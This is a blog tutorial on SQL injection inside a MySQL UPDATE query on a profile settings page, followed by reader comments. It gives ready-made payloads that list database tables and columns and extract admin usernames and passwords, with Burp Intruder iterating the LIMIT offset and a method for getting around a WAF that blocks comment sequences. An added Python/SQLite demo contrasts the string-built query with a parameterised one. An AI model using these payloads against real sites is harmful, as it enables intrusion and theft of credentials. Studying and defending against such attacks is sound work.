Tutorial: SQL injection inside UPDATE query

September 15, 2016


This tutorial walks through SQL injection (SQLi) inside an UPDATE query. The injection point is in the profile settings page.

Picture of settings panel:


The vulnerable parameter is the “E-mail format:” value. We use Tamper Data to intercept and change the submitted values.

Picture of intercepted values:

After we click “ok” we get this.

Picture of MySQL error:

First we want to find the database version, but what is the easiest way?
We can assign values to other parameters: MySQL will accept that as long as the parameter is one of the columns in the UPDATE query's SET list. We will use “fname”, which is a string column. The query output will then be shown inside the “First name” input box (where it currently says MaXoNe).

Picture of version query:

Picture of rendered content with database answer:

Now that we know how to build our query, let's get the tables.
Full query: html' , fname = (select group_concat(table_name) from information_schema.tables where table_schema = database()) , phone = '

Picture of get tables query:

Picture of rendered content with database answer:

Only three tables? Strange. Let's check that again using count.

Full query: html' , fname = (select count(table_name) from information_schema.tables where table_schema = database()) , phone = '

Picture of get tables count query:

Picture of rendered content with database answer:

Now it is time for Burp Intruder. Set the browser to use the proxy at 127.0.0.1 port 8080 for all URLs.
We use Burp Suite Intruder with attack type “Sniper” and payload type “Numbers”.

Full query: html' , fname = (select concat(table_name) from information_schema.tables where table_schema = database() limit 0,1) , phone = '

Picture of burp settings:


That's all. Now get the columns the same way with Burp Suite (the table name is given as the hex literal 0x61646d696e73, which is “admins”, so no quotes are needed inside the payload).
Full query: html' , fname = (select concat(column_name) from information_schema.columns where table_name = 0x61646d696e73 limit n,1) , phone = '

Just increment n with Burp Suite.

Values:
Full query: html' , fname = (select concat(user,0x3a,pass) from admins limit n,1) , phone = '

Just increment n with Burp Suite.

That's it. Simple, yet effective. I used this because the WAF blocked -- and --+, so I wasn't able to close and comment out the query.
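The following is an added example, not code from the tutorial: a Python/SQLite stand-in for the profile UPDATE (the table name "profile", the columns fname/email_format/phone and the "admins" table are assumptions) showing why the injected SET-list assignment works without any comment terminator, and how the parameterised form stores the same input as plain data. SQLite's sqlite_master stands in for MySQL's information_schema.

```python
import sqlite3

# Constructed schema mirroring the tutorial's profile form (assumed names:
# table "profile" with fname/email_format/phone; a second table "admins"
# so that the table count is not trivially 1).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE profile (id INTEGER PRIMARY KEY, fname TEXT,
                              email_format TEXT, phone TEXT);
        INSERT INTO profile VALUES (1, 'MaXoNe', 'html', '555-0100');
        CREATE TABLE admins (user TEXT, pass TEXT);
    """)
    return conn

# SQLite equivalent of the tutorial's table-count payload: a subquery is
# injected into the SET list, and the trailing "phone = '" re-opens a string
# literal that absorbs the application's own closing quote, so no "--" is
# needed to terminate the statement.
PAYLOAD = ("html' , fname = (select count(name) from sqlite_master "
           "where type = 'table') , phone = '")

def update_vulnerable(conn, uid, email_format, phone):
    # String-built query: user input becomes part of the SET list, so the
    # attacker can assign any column of the UPDATE, e.g. fname.
    sql = ("UPDATE profile SET email_format = '%s', phone = '%s' WHERE id = %d"
           % (email_format, phone, uid))
    conn.execute(sql)
    conn.commit()
    return sql

def update_safe(conn, uid, email_format, phone):
    # Parameterised query: the same input is stored verbatim as data and
    # never reaches the SQL parser as syntax.
    conn.execute("UPDATE profile SET email_format = ?, phone = ? WHERE id = ?",
                 (email_format, phone, uid))
    conn.commit()

def row_of(conn, uid):
    # (fname, email_format, phone) as the settings page would render them.
    r = conn.execute("SELECT fname, email_format, phone FROM profile WHERE id = ?",
                     (uid,)).fetchone()
    return tuple(str(v) for v in r)

if __name__ == "__main__":
    db = make_db()
    update_vulnerable(db, 1, PAYLOAD, "555-0100")
    print("vulnerable:", row_of(db, 1))  # fname now shows the table count
    db = make_db()
    update_safe(db, 1, PAYLOAD, "555-0100")
    print("safe:", row_of(db, 1))        # payload stored literally in email_format
```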


I hope you enjoyed this article and look forward to doing more. Let me know what you think in the comments 🙂

6 Comments
  1. Does anyone proofread these?

  2. Nice article.

    Cheers!

  3. Nice tutorial.

    balkan boy. 😀
